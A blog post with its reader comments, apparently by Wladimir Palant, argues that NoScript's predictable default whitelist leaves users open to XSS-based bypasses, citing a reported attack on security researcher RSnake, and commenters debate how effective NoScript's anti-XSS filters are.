Predictable whitelists strike again

A little more than half a year ago I wrote an article on how security solutions using whitelists are better than those using blacklists. At the same time I noted that even using whitelists is not always enough — for example when your whitelist is predictable and the attacker can make sure the whitelisting rule applies to him. NoScript extension was the example I used, and its author reacted by adding “XSS protection” assuming that this would invalidate my claims.

Well, it doesn’t. XSS is a very complex problem, and all the simple solutions to this problem usually turn out wrong. Which is once more confirmed by the attack on the security expert RSnake. The attackers knew that RSnake is using NoScript, so they simply included NoScript in their plan. They guessed that RSnake would whitelist his own site, found an XSS vulnerability there, used an XSS attack NoScript wouldn’t stop — and they would have been able to run JavaScript despite NoScript hadn’t their guess been wrong. That’s exactly the kind of attack I spoke about in my article.

Now RSnake was in a much better situation than the majority of NoScript users. He did not only notice the attack that executed in background, he probably didn’t even have a single entry in his NoScript whitelist to be exploited. Too bad that 99% of the users never configure anything — meaning that they still use the default whitelisting entries that NoScript comes with and that I warned against a while ago. Instead of cutting this list down to the bare minimum (ideally: zero), the author kept four (!) of his domains on the default whitelist — and Google ads, just to make sure he still gets money from people forced to visit on each NoScript update (which happens approximately once per week).

To reiterate what I already stated before: if Firefox users ever come under attack (hardly ever happened so far, at least if you run the latest Firefox version) — for the vast majority of users NoScript will not be a help. It tends to stop lots of harmless (meaning useful) stuff but cannot be relied on when it comes to the attacks it is supposed to stop.

Comments

  • ecjs

    Nice point, once again.

  • pirlouy

    and Google ads, just to make sure he still gets money from people forced to visit on each NoScript update (which happens approximately once per week)

    Waouh… Nice one. :P
    It would be cool if Giorgio answered this (here or in his blog). And like he’s cool, I’m sure he’ll answer. :-)

    Wladimir Palant

    I doubt that he will answer. It isn’t like I didn’t discuss this issue with him. However, it seems that his ad income is more important than the security of NoScript users.

  • pirlouy

    I don’t want to try Noscript again, but I suppose “google.com” is in whitelist because of Gmail.

    But like there are several redirections on his site, it’s possible this is in his whitelist for another reason…

    Wladimir Palant

    Google Ads are not served from google.com – googlesyndication.com is the domain, it is used only for Google Ads. And it is on the whitelist by default.

  • Computer Literate

    The bit about whitelisting googlesyndication.com reminds me of something Blake Ross wrote:

    “Have you heard the one about how [Netscape] whitelisted themselves? This is one of my favorite anecdotes, and though my memory is fuzzy about the exact timeline and versions involved, it goes something like this: Mozilla implements popup blocking and releases a milestone to great acclaim. Netscape soon follows with its own release based on the Mozilla offering. Because Netscape is Mozilla at its core, the press is naturally expecting it to have popup blocking. It doesn’t, because—lo and behold—some AOL/Netscape web properties use popup ads, and heaven forbid those get blocked! After a thorough public lashing, Netscape goes back to the drawing board and finally puts out a release that blocks popups. The catch: a whitelist, buried in preferences and thus out of reach of most users, that permits AOL web properties to continue opening popup ads. One of these properties just so happened to be Netscape.com.

    “Guess what the browser’s default homepage was.

    “The user started up his shiny new browser—NOW WITH POPUP BLOCKING!—and got a popup ad.

    “Netscape isn’t doing too well these days.”

    Original blog post

  • tlu

    Wladimir,

    I think you are wrong here. This attack didn’t have anything to do with RSnake’s whitelisting his website in Noscript. RSnake himself mentioned a “vuln in NoScript” (which has been fixed in the meanwhile). Whitelisting wasn’t the culprit as “since version 1.1.4.9 NoScript checks also requests started from whitelisted origins for specific suspicious URL patterns landing on other trusted sites: if a potential XSS attack is detected, even if coming from a trusted source, filters are promptly triggered” (quotze the Noscript site).

    Wladimir Palant

    No, I think I got it right. Of course, RSnake doesn’t describe the attack in all details but my understanding is that “vuln in NoScript” means an XSS attack that wasn’t stopped by NoScript (simply because you cannot distinguish an XSS attack from a correct request that easily). So we got back to the problem where a non-trusted site can XSS into a whitelisted site and run JavaScript by doing that (the problem that was “solved” by NoScript 1.1.4.9). This is the classic case where you solve one problem by creating an even bigger problem – now everything that the XSS protection in NoScript misses is a vulnerability in NoScript (and it misses a lot).

  • tlu

    So what you’re saying is that the anti-XSS filters in Noscript are not perfect which may be true (although Giorgio is constantly updating them). This confirms that whitelisting per se isn’t the problem.

  • tlu

    Oh, just another remark: If Noscript’s XSS protection isn’t really perfect – to what extent is this creating “an even bigger problem” compared to not using Noscript at all???

    Wladimir Palant

    I was referring to the way Giorgio “fixed” the issue of predictable whitelists. Instead of actually fixing it he created an even bigger issue. Now NoScript is relying heavily on the quality of its XSS protection – a hole in this protection brings back the old whitelists issue and makes NoScript useless. And since the quality of the XSS protection isn’t good enough (cannot be good enough), a somewhat determined attacker can still abuse predictable whitelists. And I simply don’t think that something that relies on the attacker being stupid can be called a security solution (stupid attackers usually aren’t dangerous anyway).

  • tlu

    “The quality of the XSS protection isn’t good enough”? Well, first of all, Sirdarckcat and kuza55 needed several weeks to find out, by combining 3 weaknesses (one of them specific to ha.ckers.org), how to bypass Noscript – so it doesn’t seem to be that easy. And while Giorgio himself surely wouldn’t rule out any loopholes in Noscript’s anti-XSS code, it’s remarkable that none of these hundreds or thousands obfuscated XSS vectors posted on sla.ckers.org were able to bypass it.

    But if you really think that it’s not good enough, why don’t you prove it by posting your results in http://sla.ckers.org/forum/read.php?12,17238 ?

  • kuza55

    @tlu:

    This is a bit late, but I wanted to mention it anyway; it took only an hour or two to get from finding a vulnerability in RSnake’s site to having a working attack which evaded NoScript, and I have no idea where you got your several weeks from…..

    Wladimir Palant

    Thanks, that’s what I suspected.

  • Great Wizard

    You can also say, in the same vein of logic, that all automated defense programs are useless. The fact that a human hacker who specifically targets someone is able to breach his security to some extent doesn’t mean that no script is useless. Its useful to most users who won’t be attacked directly but might get bothered by different malacious scripting on the web.

  • SZ

    I quite agree.

    Also if you are saying that XSS protection is in4evitabley going to fail then you might as well scrap the whole thing. But then you would have NO protection in that category, which is the reason it was implemented in the first place!

    From what I have read sofar, it seems you are wanting to say that whitelisting is not what should be used. But, instead blacklisting is what should be used.

    If this is the case, I have several weaknesses I can see. First, Blacklisting inevitably will make a mistake and not list a vendor, thus enabling an attack. The Attacker could also feasibly enable an address that is not blacklisted. PLUS, the list would have to be huge if it was to provide adequate protection, thus slowing the browser down, and increasing its memory usage.

    Have a good day. :p

  • ma

    SZ,

    The first sentence in the article says: “security solutions using whitelists are better than those using blacklists”.

    The whitelist should ideally initially have zero entries. However, I still want the noscript author to receive ad revenue.

  • Matt P

    I use noscript not for all-consuming protection against a directed attack against me, but for protection from accidental visiting of malicious websites, and annoying ad-sites(which may dump adware on your computer, often operating from white-listed sites).

    If i visit a thought-to-be safe website and it turns out it is not a safe website, NoScript protects me and prevents the bad scripts from running. These kinds of websites are not directly attacking me, trying to circumvent my NoScript or anything, but simply trying to dump whatever they can on whoever comes across their website.